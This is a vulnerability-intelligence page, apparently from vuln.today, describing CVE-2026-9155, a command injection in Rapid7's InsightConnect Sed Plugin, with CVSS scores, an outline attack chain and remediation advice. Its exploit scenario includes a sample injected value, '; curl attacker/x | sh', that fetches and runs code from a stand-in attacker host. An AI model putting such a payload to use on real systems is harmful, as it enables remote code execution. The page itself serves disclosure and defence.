Skip to main content

InsightConnect Sed Plugin CVE-2026-9155

| EUVDEUVD-2026-39153 HIGH
OS Command Injection (CWE-78)
2026-06-25 rapid7 GHSA-v3gg-5r82-j6rc
8.8
CVSS 3.1 · Vendor: rapid7
Share

Severity by source

Vendor (rapid7) PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Network-reachable SOAR API with low complexity but requires an authenticated workflow-authoring user (PR:L); command execution yields full C/I/A impact within the unchanged plugin scope.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (rapid7).

CVSS VectorVendor: rapid7

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jun 25, 2026 - 02:01 EUVD
Analysis Generated
Jun 25, 2026 - 00:58 vuln.today
CVE Published
Jun 25, 2026 - 00:25 cve.org
HIGH 8.8

DescriptionCVE.org

OS Command Injection vulnerability in Rapid7 InsightConnect Sed Plugin on Linux allows authenticated attackers to execute arbitrary OS commands via the expression parameter due to insufficient input validation.

AnalysisAI

OS command injection in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated operator inject arbitrary shell commands through the plugin's expression parameter, which is passed to the underlying sed invocation without sufficient sanitization. Because InsightConnect is a SOAR orchestration platform, a low-privileged workflow author or connected user (PR:L) can achieve full code execution in the plugin's runtime context (C:H/I:H/A:H, CVSS 8.8). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to InsightConnect as low-privileged user
Delivery
Add/modify workflow using Sed plugin
Exploit
Inject shell metacharacters into expression parameter
Execution
Trigger workflow execution
Persist
sed invocation runs injected OS command
Impact
Arbitrary code execution in plugin container

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated InsightConnect user (CVSS PR:L) who can supply or influence the Sed plugin's `expression` parameter - typically a workflow author, or any data source feeding that parameter within a runnable workflow - on a Linux deployment where the Sed plugin is installed and used. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, base 8.8) describes a network-reachable, low-complexity attack requiring some authentication (PR:L) and no user interaction, with high impact to confidentiality, integrity and availability - a serious score for an authenticated flaw. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated InsightConnect user with workflow-authoring privileges (or an attacker who has phished/compromised such an account) configures a step that calls the Sed plugin and supplies an `expression` value containing shell metacharacters or a sed `e` command, e.g. embedding `; curl attacker/x | sh`. …
Remediation Update the InsightConnect Sed Plugin to the latest fixed version published on the Rapid7 extension marketplace (https://extensions.rapid7.com/extension/sed); no exact fix version was provided in the input data, so confirm the patched build number directly from that advisory before deploying - No vendor-released patch version identified at time of analysis in the supplied data. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Identify all InsightConnect instances with Sed Plugin enabled; audit current operator access and review recent plugin execution logs for suspicious activity. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9155 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy